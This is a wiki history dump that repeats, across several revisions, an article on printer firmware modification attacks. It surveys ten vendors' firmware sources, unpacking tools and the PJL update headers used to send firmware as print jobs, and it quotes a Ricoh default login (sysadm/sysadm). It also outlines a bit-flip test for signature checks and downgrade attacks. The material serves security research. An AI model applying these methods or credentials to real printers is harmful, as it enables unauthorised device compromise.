by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not published any information on protection mechanisms. Firmware released before 2016 did not apply code signing and could be manipulated as shown by <ref>''[https://os-s.de/advisories/OSS-2016-19_epson-mfp.pdf] Epson WorkForce Lack Of Firmware Signing / CSRF'', R. Spenneberg</ref>. They ‘believe huge amounts of the devices produced since 1999 […] could be vulnerable’. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfied by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 4144f76c23975d0a096f947180baaeed2c57a8e2 321 320 2017-01-31T09:04:53Z 84.153.135.37 0 /* Results */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included <code>.zip</code> files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 <code>.hd</code> files containing <code>@PJL FIRMWARE=…</code>, 25 <code>.prn</code> files containing <code>@PJL ENTER LANGUAGE=DOWNLOAD</code> and 30 <code>.fls</code>/<code>.fly</code> files containing <code>@PJL LPROGRAMRIP</code> were found. Regarding protection mechanisms, Dell has not released any publicly available information. === Brother === Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension <code>.djf</code> and contain <code>@PJL EXECUTE BRDOWNLOAD</code>, while 9 <code>.blf</code> files contain <code>@PJL ENTER LANGUAGE=PCL</code>. Brother has not released any publicly available information on protection mechanisms. === Lexmark === Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 <code>fls</code> files could be obtained containing the PJL header <code>@PJL LPROGRAMRIP</code> to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref>. === Samsung === Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 <code>.hd</code> files starting with <code>@PJL FIRMWARE</code> and associated <code>.prn</code> files containing <code>@PJL DEFAULT SWUPGRADE=ON</code> could be obtained. Samsung has not released any publicly available information on protection mechanisms. === Xerox === Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 <code>.hd</code> files including <code>@PJL FIRMWARE=…</code>, 36 PostScript files for older devices and 35 <code>.dlm</code> files which is the format used by currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by <ref name="heiland2011patched"/> and extended by <ref name="weidenbach2016pwn"/>, leading to remote code execution – the private key and the tool used for code signing was contained in the firmware itself. === Ricoh === The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (<code>site:support.ricoh.com firmware</code>). Files can be unpacked using ''unp''. 14 <code>.bin</code> files contain <code>@PJL RSYSTEMUPDATE SIZE=…</code> while 15 <code>.brn</code> files are associated with a <code>settings.ini</code>, including <code>@PJL FWDOWNLOAD</code> and <code>USERID=sysadm, PASSWORD=sysadm</code>. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ <ref>''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10</ref>. === Kyocera === Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''<ref>''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan</ref> and ''squashfs''<ref>''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher</ref> images as well as proprietary binary formats. Firmware is deployed as a print job with <code>!R! UPGR'SYS';EXIT;</code> prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language <ref>''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19</ref>. Kyocera has not released any publicly available information on protection mechanisms. === Konica === Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary <code>.bin</code> files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like <code>@PJL ENTER LANGUAGE=FIRMUPDATE</code>. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ <ref>''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26</ref>. It may be doubted that such a scheme is cryptographically secure. == Results == Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below: {| class="wikitable" |- ! Vendor !! Extension !! Quantity !! File header or type |- | rowspan="2" | HP | rfu || 419 || @PJL UPGRADE SIZE=… |- | bdl || 206 || FutureSmart binary format |- | rowspan="3" | Epson | rcx || 49 || SEIKO EPSON EpsonNet Form |- | prn || 9 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | brn || 7 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | rowspan="6" | Dell | fls, fly || 30 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | prn || 25 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 18 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 3 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | ps || 2 || PostScript (title: ''Firmware Update'') |- | pjl || 1 || @PJL ENTER LANGUAGE=FLASH |- | rowspan="2" | Brother | djf || 79 || @PJL EXECUTE BRDOWNLOAD |- | blf || 9 || @PJL ENTER LANGUAGE=PCL |- | rowspan="2" | Lexmark | fls || 63 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | bin, fls || 6 || Unknown binary format |- | rowspan="2" | Samsung | hd || 33 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | fls, hd0 || 4 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | rowspan="10" | Xerox | ps || 36 || PostScript (title: ''Firmware Update'') |- | dlm || 35 || Xerox Dynamic Loadable Module |- | prn, bin || 20 || <span style="background:#98FB98">@PJL ENTER LANGUAGE=DOWNLOAD</span> |- | hd || 16 || <span style="background:#F4A460">@PJL FIRMWARE=…</span> |- | brn || 10 || <span style="background:#F0E68C">Unknown binary, includes config file</span> |- | bin || 10 || @PJL SET JOBATTR="@SWDL" |- | fls, hd, hde || 8 || <span style="background:#DDA0DD">@PJL DEFAULT P1284VALUE=…</span> |- | fls, xfc || 4 || @PJL ENTER LANGUAGE=XFLASH |- | pjl || 3 || @PJL FSDOWNLOAD [name].rpm |- | axf || 3 || RISC OS AIF executable |- | rowspan="3" | Ricoh | brn || 15 || @PJL FWDOWNLOAD… |- | bin || 14 || @PJL RSYSTEMUPDATE SIZE=… |- | fls || 4 || <span style="background:#87CEEB">@PJL LPROGRAMRIP</span> |- | rowspan="4" | Kyocera | cramfs, img || 98 || cramfs image |- | bin, squashfs || 79 || squashfs image |- | bin, kmmfp || 41 || u-boot legacy uImage |- | efi, kmpanel || 13 || proprietary image format |- | rowspan="4" | Konica Minolta | bin || 38 || unknown binary, additional checksum file |- | ps || 20 || PostScript (title: ''Softload printer modules'') |- | ftp, prn || 11 || @PJL ENTER LANGUAGE=FIRMUPDATE |- | upg || 1 || @PJL ENTER LANGUAGE=UPGRADE |- |} '''How to test for this attack?''' The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verfied by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 68144e588747b9ea3b9330aeed036e5a4df66b3a 320 319 2017-01-31T08:58:10Z 84.153.135.37 0 /* Brother */ wikitext text/x-wiki The dangers of malicious firmware updates are well-known and have been discussed early by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device. Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturer started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>. == Vendors == To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows. === HP === Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>. === Canon === Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’. === Epson === Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref> which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not released any publicly available information on protection mechanisms. === Dell === Firmware can be 